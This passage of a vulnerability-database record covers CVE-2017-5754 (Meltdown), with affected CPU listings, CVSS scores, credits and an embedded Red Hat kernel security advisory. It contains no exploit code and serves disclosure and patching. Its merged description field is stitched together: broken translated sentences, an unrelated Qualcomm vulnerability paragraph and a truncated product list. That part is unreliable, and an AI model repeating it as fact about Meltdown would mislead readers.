"cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2670_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4603:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2403:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4617:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2420:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1660:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2430l:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2637:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2450:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2658:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2660:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8870:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8867l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4850:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4830:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4820:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2803:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8894_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8860_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4850_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8880_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8870_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8850_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8857_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4890_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4880_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2880_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2870_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4114:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4112:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6148f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6148:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6138t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6138f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6130f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6130:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5120:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5119t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8170:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8168:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8156:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8153:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7210f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7210:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7235:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:8350u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:8250u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7820hk:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7820eq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7560u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7500u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6500:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6500t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6442eq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6360u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6300:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6300t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6167u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m7:6y75:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m5:6y54:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5700hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5775r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:5675r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:5675c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:5250u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:5200u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m:5y51:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m:5y31:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4960hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4980hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4700eq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4700hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4700mq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4712mq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4720hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4765t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4790s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4790t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4510u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4550u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4690:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570te:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4590:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4400e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4460t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4300m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4300u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4350u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4360u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4210m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4210u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4288u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4330:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4360t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4370:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4110m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4112e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4150t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4150:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4130t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4020y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4025u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:arm:cortex-a:75:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2017-5754" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "These issues were researched and reported by researchers at Google Project Zero (Jann Horn) the Institute of Applied Information Processing and Communications (IAIK) at Graz University of Technology (Gruss et. al.), Paul Kocher, and Anders Fogh.This document was written by Art Manion and Will Dormann.", "sources": [ { "db": "CERT/CC", "id": "VU#584653" } ], "trust": 0.8 }, "cve": "CVE-2017-5754", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 4.7, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.4, "impactScore": 6.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Medium", "accessVector": "Local", "authentication": "Single", "author": "IPA", "availabilityImpact": "None", "baseScore": 4.4, "confidentialityImpact": "Complete", "exploitabilityScore": null, "id": "JVNDB-2018-001001", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:L/AC:M/Au:S/C:C/I:N/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 4.7, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.4, "id": "CNVD-2018-00303", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.7, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.4, "id": "VHN-113957", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:L/AC:M/AU:N/C:C/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "LOCAL", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.1, "impactScore": 4.0, "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0" }, { "attackComplexity": "High", "attackVector": "Local", "author": "IPA", "availabilityImpact": "None", "baseScore": 4.7, "baseSeverity": "Medium", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2018-001001", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "Low", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2017-5754", "trust": 1.0, "value": "MEDIUM" }, { "author": "IPA", "id": "JVNDB-2018-001001", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2018-00303", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-113957", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-00303" }, { "db": "VULHUB", "id": "VHN-113957" }, { "db": "JVNDB", "id": "JVNDB-2018-001001" }, { "db": "NVD", "id": "CVE-2017-5754" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache. Has speculative execution function and out-of-order execution function CPU Several researchers have reported methods of performing side-channel attacks against Has speculative execution function and out-of-order execution function CPU side-channel attack method against (Spectre and Meltdown) has been reported. For more information, Google Project Zero blog post in (\"Reading privileged memory with a side-channel\") or Graz University of Technology (TU Graz) information from researchers in (\"Meltdown and Spectre\") Please refer to. \"Reading privileged memory with a side-channel\"https://googleprojectzero.blogspot.jp/2018/01/reading-privileged-memory-with-side.html\"Meltdown and Spectre\"https://meltdownattack.com/Sensitive information can be obtained from processes running with user privileges. Spectre As for the attack, crafted Javascript by the code Javascript cannot be obtained from web It has been reported that data can be obtained during the browser process. SpectreMeltdownCPU mechanism for triggeringSpeculative execution from branch predictionOut-of-order executionAffected platformsCPUs that perform speculative execution from branch predictionCPUs that allow memory reads in out-of-order instructionsDifficulty of successful attackHigh - Requires tailoring to the software environment of the victim processLow - Kernel memory access exploit code is mostly universalImpactCross- and intra-process (including kernel) memory disclosureKernel memory disclosure to userspaceSoftware mitigationsVariant 1: Compiler changes. Web browser updates to help prevent exploitation from JavaScriptVariant 2: Indirect Branch Restricted Speculation (IBRS). Note: The software mitigation for Spectre variant 2 requires CPU microcode updatesKernel page-table isolation (KPTI)CVE-2017-5715 Affected\nCVE-2017-5753 Affected\nCVE-2017-5754 Affected. Two vulnerabilities are identified, known as \"Variant 3a\" and \"Variant 4\". CPUhardware is a set of firmware that runs in the CPU (Central Processing Unit) for managing and controlling the CPU. The Spectre vulnerability exists in the CPU processor core. Because Intel does not separate low-privileged applications from accessing kernel memory, an attacker can use a malicious application to obtain private data that should be quarantined. \nAttackers can exploit this issue to obtain sensitive information that may aid in further attacks. Qualcomm Closed-Source Components are prone to multiple unspecified vulnerabilities. \nAn attacker can exploit these issues to perform unauthorized actions. This may aid in further attacks. \nThese issues are being tracked by Android Bug IDs A-78135902, A-66913713, A-67712316, A-79419833, A-109678200, A-78283451, A-78285196, A-78284194, A-78284753, A-78284517, A-78240177, A-78239686, A-78284545, A-109660689, A-78240324, A-68141338, A-78286046, A-73539037, A-73539235, A-71501115, A-33757308, A-74236942, A-77485184, A-77484529, A-33385206, A-79419639, A-79420511, A-109678338, and A-112279564. Intel and ARM CPU chips have an information disclosure vulnerability, which originates from a flaw in the processor data boundary mechanism. The following products and versions are affected: ARM Cortex-A75; Intel Xeon E5-1650 v3, v2, v4; Xeon E3-1265l v2, v3, v4; Xeon E3-1245 v2, v3, v5, v6; Xeon X7542 wait. \n\nSecurity Fix(es):\n\n* hw: cpu: speculative execution permission faults handling (CVE-2017-5754)\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nBug Fix(es):\n\n* If an NFSv3 client mounted a subdirectory of an exported file system, a\ndirectory entry to the mount hosting the export was incorrectly held even\nafter clearing the cache. Consequently, attempts to unmount the\nsubdirectory with the umount command failed with the EBUSY error. With this\nupdate, the underlying source code has been fixed, and the unmount\noperation now succeeds as expected in the described situation. (BZ#1538588)\n\n* The kernel build requirements have been updated to the GNU Compiler\nCollection (GCC) compiler version that has the support for Retpolines. The\nRetpolines mechanism is a software construct that leverages specific\nknowledge of the underlying hardware to mitigate the branch target\ninjection, also known as Spectre variant 2 vulnerability described in\nCVE-2017-5715. (BZ#1554254)\n\n4. X-Scanned-By: MIMEDefang 2.79 on 10.5.11.16\nX-Greylist: Sender IP whitelisted, not delayed by milter-greylist-4.5.16 (mx1.redhat.com [10.5.110.25]); Thu, 04 Jan 2018 01:01:01 +0000 (UTC)\n\n\n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: kernel security update\nAdvisory ID: RHSA-2018:0008-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2018:0008\nIssue date: 2018-01-03\n=====================================================================\n\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\nSecurity Fix(es):\n\nAn industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of instructions (a commonly\nused performance optimization). There are three primary variants of the\nissue which differ in the way the speculative execution can be exploited. \n\nNote: This issue is present in hardware and cannot be fully fixed via\nsoftware update. The updated kernel packages provide software mitigation\nfor this hardware issue at a cost of potential performance penalty. Please\nrefer to References section for further information about this issue and\nthe performance impact. \n\nIn this update mitigations for x86-64 architecture are provided. \n\nVariant CVE-2017-5753 triggers the speculative execution by performing a\nbounds-check bypass. It relies on the presence of a precisely-defined\ninstruction sequence in the privileged code as well as the fact that memory\naccesses may cause allocation into the microprocessor\u0027s data cache even for\nspeculatively executed instructions that never actually commit (retire). As\na result, an unprivileged attacker could use this flaw to cross the syscall\nboundary and read privileged memory by conducting targeted cache\nside-channel attacks. (CVE-2017-5753, Important)\n\nVariant CVE-2017-5715 triggers the speculative execution by utilizing\nbranch target injection. It relies on the presence of a precisely-defined\ninstruction sequence in the privileged code as well as the fact that memory\naccesses may cause allocation into the microprocessor\u0027s data cache even for\nspeculatively executed instructions that never actually commit (retire). As\na result, an unprivileged attacker could use this flaw to cross the syscall\nand guest/host boundaries and read privileged memory by conducting targeted\ncache side-channel attacks. (CVE-2017-5715, Important)\n\nVariant CVE-2017-5754 relies on the fact that, on impacted microprocessors,\nduring speculative execution of instruction permission faults, exception\ngeneration triggered by a faulting access is suppressed until the\nretirement of the whole instruction block. In a combination with the fact\nthat memory accesses may populate the cache even when the block is being\ndropped and never committed (executed), an unprivileged local attacker\ncould use this flaw to read privileged (kernel space) memory by conducting\ntargeted cache side-channel attacks. (CVE-2017-5754, Important)\n\nNote: CVE-2017-5754 affects Intel x86-64 microprocessors. AMD x86-64\nmicroprocessors are not affected by this issue. \n\nRed Hat would like to thank Google Project Zero for reporting these issues. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1519778 - CVE-2017-5753 hw: cpu: speculative execution bounds-check bypass\n1519780 - CVE-2017-5715 hw: cpu: speculative execution branch target injection\n1519781 - CVE-2017-5754 hw: cpu: speculative execution permission faults handling\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nkernel-2.6.32-696.18.7.el6.src.rpm\n\ni386:\nkernel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-headers-2.6.32-696.18.7.el6.i686.rpm\nperf-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm\nkernel-doc-2.6.32-696.18.7.el6.noarch.rpm\nkernel-firmware-2.6.32-696.18.7.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-headers-2.6.32-696.18.7.el6.x86_64.rpm\nperf-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 